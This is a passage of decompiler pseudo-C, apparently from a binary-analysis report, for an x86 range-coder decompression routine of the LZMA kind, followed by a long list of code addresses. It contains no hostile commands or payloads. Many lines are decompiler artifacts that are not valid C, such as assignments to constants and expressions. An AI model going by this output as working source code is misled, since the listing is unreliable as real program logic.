												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                          0x00000000
                                                          0x00406440
                                                          0x00406440
                                                          0x00406444
                                                          0x00406451
                                                          0x0040645b
                                                          0x00000000
                                                          0x00406446
                                                          0x00406446
                                                          0x00406481
                                                          0x00406484
                                                          0x00406487
                                                          0x0040648a
                                                          0x0040648a
                                                          0x0040648d
                                                          0x00406494
                                                          0x00406499
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406740
                                                          0x00406744
                                                          0x004068f3
                                                          0x00406909
                                                          0x00406911
                                                          0x00406918
                                                          0x0040691a
                                                          0x00406921
                                                          0x00406925
                                                          0x00406925
                                                          0x00406750
                                                          0x00406757
                                                          0x0040675f
                                                          0x00406762
                                                          0x00406765
                                                          0x00406765
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f07
                                                          0x00405f10
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x00000000
                                                          0x00405f21
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f2a
                                                          0x00405f2d
                                                          0x00405f30
                                                          0x00405f34
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f3a
                                                          0x00405f3d
                                                          0x00405f3f
                                                          0x00405f40
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f46
                                                          0x00405f48
                                                          0x00405f4b
                                                          0x00405f50
                                                          0x00405f55
                                                          0x00405f5e
                                                          0x00405f71
                                                          0x00405f74
                                                          0x00405f80
                                                          0x00405fa8
                                                          0x00405faa
                                                          0x00405fb8
                                                          0x00405fb8
                                                          0x00405fbc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405fac
                                                          0x00405faf
                                                          0x00405fb0
                                                          0x00405fb0
                                                          0x00000000
                                                          0x00405fac
                                                          0x00405f86
                                                          0x00405f8b
                                                          0x00405f8b
                                                          0x00405f94
                                                          0x00405f9c
                                                          0x00405f9f
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fa5
                                                          0x00000000
                                                          0x00405fc2
                                                          0x00405fc2
                                                          0x00405fc6
                                                          0x00406872
                                                          0x00000000
                                                          0x00406872
                                                          0x00405fcf
                                                          0x00405fdf
                                                          0x00405fe2
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe5
                                                          0x00405fe8
                                                          0x00405fec
                                                          0x00000000
                                                          0x00000000
                                                          0x00405fee
                                                          0x00405ff4
                                                          0x0040601e
                                                          0x00406024
                                                          0x0040602b
                                                          0x00000000
                                                          0x0040602b
                                                          0x00405ffa
                                                          0x00405ffd
                                                          0x00406002
                                                          0x00406002
                                                          0x0040600d
                                                          0x00406015
                                                          0x00406018
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040605d
                                                          0x00406063
                                                          0x00406066
                                                          0x00406073
                                                          0x0040607b
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00406032
                                                          0x00406032
                                                          0x00406036
                                                          0x00406881
                                                          0x00000000
                                                          0x00406881
                                                          0x00406042
                                                          0x0040604d
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406050
                                                          0x00406053
                                                          0x00406056
                                                          0x0040605b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004066f2
                                                          0x004066f2
                                                          0x004066f8
                                                          0x004066fe
                                                          0x00406704
                                                          0x0040671e
                                                          0x00406721
                                                          0x00406727
                                                          0x00406732
                                                          0x00406734
                                                          0x00406706
                                                          0x00406706
                                                          0x00406715
                                                          0x00406719
                                                          0x00406719
                                                          0x0040673e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406083
                                                          0x00406085
                                                          0x00406088
                                                          0x004060f9
                                                          0x004060fc
                                                          0x004060ff
                                                          0x00406106
                                                          0x00406110
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x0040608a
                                                          0x0040608e
                                                          0x00406091
                                                          0x00406093
                                                          0x00406096
                                                          0x00406099
                                                          0x0040609b
                                                          0x0040609e
                                                          0x004060a0
                                                          0x004060a5
                                                          0x004060a8
                                                          0x004060ab
                                                          0x004060af
                                                          0x004060b6
                                                          0x004060b9
                                                          0x004060c0
                                                          0x004060c4
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060cc
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060c6
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060bb
                                                          0x004060d0
                                                          0x004060d3
                                                          0x004060f1
                                                          0x004060f3
                                                          0x00000000
                                                          0x004060d5
                                                          0x004060d5
                                                          0x004060d8
                                                          0x004060db
                                                          0x004060de
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e0
                                                          0x004060e3
                                                          0x004060e6
                                                          0x004060e8
                                                          0x004060e9
                                                          0x004060ec
                                                          0x00000000
                                                          0x004060ec
                                                          0x00000000
                                                          0x00406322
                                                          0x00406326
                                                          0x00406344
                                                          0x00406347
                                                          0x0040634e
                                                          0x00406351
                                                          0x00406354
                                                          0x00406357
                                                          0x0040635a
                                                          0x0040635d
                                                          0x0040635f
                                                          0x00406366
                                                          0x00406367
                                                          0x00406369
                                                          0x0040636c
                                                          0x0040636f
                                                          0x00406372
                                                          0x00406372
                                                          0x00406377
                                                          0x00000000
                                                          0x00406377
                                                          0x00406328
                                                          0x0040632b
                                                          0x0040632e
                                                          0x00406338
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x0040638c
                                                          0x00406390
                                                          0x004063b3
                                                          0x004063b6
                                                          0x004063b9
                                                          0x004063c3
                                                          0x00406392
                                                          0x00406392
                                                          0x00406395
                                                          0x00406398
                                                          0x0040639b
                                                          0x004063a8
                                                          0x004063ab
                                                          0x004063ab
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x004063cf
                                                          0x004063d3
                                                          0x00000000
                                                          0x00000000
                                                          0x004063d9
                                                          0x004063dd
                                                          0x00000000
                                                          0x00000000
                                                          0x004063e3
                                                          0x004063e5
                                                          0x004063e9
                                                          0x004063e9
                                                          0x004063ec
                                                          0x004063f0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406467
                                                          0x0040646b
                                                          0x00406472
                                                          0x00406475
                                                          0x00406478
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040646d
                                                          0x0040647b
                                                          0x0040647e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406527
                                                          0x00406527
                                                          0x0040652b
                                                          0x004068c9
                                                          0x00000000
                                                          0x004068c9
                                                          0x00406531
                                                          0x00406534
                                                          0x00406537
                                                          0x0040653b
                                                          0x0040653e
                                                          0x00406544
                                                          0x00406546
                                                          0x00406546
                                                          0x00406546
                                                          0x00406549
                                                          0x0040654c
                                                          0x00000000
                                                          0x00000000
                                                          0x0040611c
                                                          0x0040611c
                                                          0x00406120
                                                          0x0040688d
                                                          0x00000000
                                                          0x0040688d
                                                          0x00406126
                                                          0x00406129
                                                          0x0040612c
                                                          0x00406130
                                                          0x00406133
                                                          0x00406139
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613b
                                                          0x0040613e
                                                          0x00406141
                                                          0x00406141
                                                          0x00406144
                                                          0x00406147
                                                          0x00000000
                                                          0x00000000
                                                          0x0040614d
                                                          0x00406153
                                                          0x00000000
                                                          0x00000000
                                                          0x00406159
                                                          0x00406159
                                                          0x0040615d
                                                          0x00406160
                                                          0x00406163
                                                          0x00406166
                                                          0x00406169
                                                          0x0040616a
                                                          0x0040616d
                                                          0x0040616f
                                                          0x00406175
                                                          0x00406178
                                                          0x0040617b
                                                          0x0040617e
                                                          0x00406181
                                                          0x00406184
                                                          0x00406187
                                                          0x004061a3
                                                          0x004061a6
                                                          0x004061a9
                                                          0x004061ac
                                                          0x004061b3
                                                          0x004061b7
                                                          0x004061b9
                                                          0x004061bd
                                                          0x00406189
                                                          0x00406189
                                                          0x0040618d
                                                          0x00406195
                                                          0x0040619a
                                                          0x0040619c
                                                          0x0040619e
                                                          0x0040619e
                                                          0x004061c0
                                                          0x004061c7
                                                          0x004061ca
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d0
                                                          0x00000000
                                                          0x004061d5
                                                          0x004061d5
                                                          0x004061d9
                                                          0x00406899
                                                          0x00000000
                                                          0x00406899
                                                          0x004061df
                                                          0x004061e2
                                                          0x004061e5
                                                          0x004061e9
                                                          0x004061ec
                                                          0x004061f2
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f4
                                                          0x004061f7
                                                          0x004061fa
                                                          0x004061fa
                                                          0x004061fa
                                                          0x00406200
                                                          0x00000000
                                                          0x00000000
                                                          0x00406202
                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
